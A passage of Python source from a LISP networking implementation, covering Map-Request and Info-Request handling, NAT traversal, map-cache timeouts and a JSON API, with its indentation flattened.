# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
if (probe_dest.is_ipv4() and probe_dest.is_multicast_address()):
dest = probe_dest
else:
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
#endif
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for Map-Request rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(list(rtr_list.values()))):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), list(rtr_list.keys())))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (addr_str in lisp_rtr_list):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in list(lisp_iid_to_interface.keys()):
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
last_refresh_time = mc.last_refresh_time
#
# If mapping system runs on this system, disregard packet activity.
# There could be a race condition for active sources, where destinations
# are not registered yet due to system restart. If the LISP subsystem
# is within 5 minutes of restarting, time out native-forward entries.
#
if (lisp_is_running("lisp-ms") and lisp_uptime + (5*60) >= now):
if (mc.action == LISP_NATIVE_FORWARD_ACTION):
last_refresh_time = 0
lprint("Remove startup-mode native-forward map-cache entry")
#endif
#endif
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Do not time out NAT-traversal default entries (0.0.0.0/0 and 0::/0).
#
if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
return([True, delete_list])
#endif
#
# Timed out.
#
ut = lisp_print_elapsed(mc.uptime)
lrt = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint(("Map-cache entry {} {}, had uptime {}, last-refresh-time {}"). \
format(green(prefix_str, False), bold("timed out", False), ut, lrt))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (hostname not in lisp_nat_state_info):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (hostname not in lisp_nat_state_info): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in list(lisp_map_resolvers_list.values()):
mr_list.append(mr.map_resolver)
#endif
dest_list = mr_list
if (dest_list == []):
for ms in list(lisp_map_servers_list.values()):
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in list(lisp_map_resolvers_list.values()):
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
# Variable "data_structure" is a string and not a byte string. Caller converts.
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache-summary"):
data = lisp_process_api_site_cache_summary(lisp_sites_by_eid)
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = lisp_fill_rloc_in_json(rloc)
#
# If this is a multicast RLOC, then add the array for member RLOCs
# that may have responded to a multicast RLOC-probe.
#
if (rloc.rloc.is_multicast_address()):
r["multicast-rloc-set"] = []
for mrloc in list(rloc.multicast_rloc_probe_list.values()):
mr = lisp_fill_rloc_in_json(mrloc)
r["multicast-rloc-set"].append(mr)
#endfor
#endif
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_fill_rloc_in_json
#
# Fill in fields from lisp_rloc() into the JSON that is reported via the
# restful API.
#
def lisp_fill_rloc_in_json(rloc):
r = {}
addr_str = None
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
addr_str = r["address"]
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
addr_str += ":" + r["encap-port"]
#endif
if (addr_str and addr_str in lisp_crypto_keys_by_rloc_encap):
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key != None and key.shared_key != None):
r["encap-crypto"] = "crypto-" + key.cipher_suite_string
#endif
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
state_change = lisp_print_elapsed(rloc.last_state_change)
if (state_change == "never"):
state_change = lisp_print_elapsed(rloc.uptime)
#endif
r["uptime"] = state_change
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
r["rloc-probe-latency"] = rloc.rloc_probe_latency
r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
return(r)
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if ("group-prefix" in parms):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache_summary
#
# Returns:
#
# [ { "site" : '<site-name>", "registrations" : [ {"eid-prefix" : "<eid>",
# "count" : "<count>", "registered-count" : "<registered>" }, ... ]
# } ]
#
def lisp_process_api_site_cache_summary(site_cache):
site = { "site" : "", "registrations" : [] }
entry = { "eid-prefix" : "", "count" : 0, "registered-count" : 0 }
sites = {}
for ml in site_cache.cache_sorted:
for se in list(site_cache.cache[ml].entries.values()):
if (se.accept_more_specifics == False): continue
if (se.site.site_name not in sites):
sites[se.site.site_name] = []
#endif
e = copy.deepcopy(entry)
e["eid-prefix"] = se.eid.print_prefix()
e["count"] = len(se.more_specific_registrations)
for mse in se.more_specific_registrations:
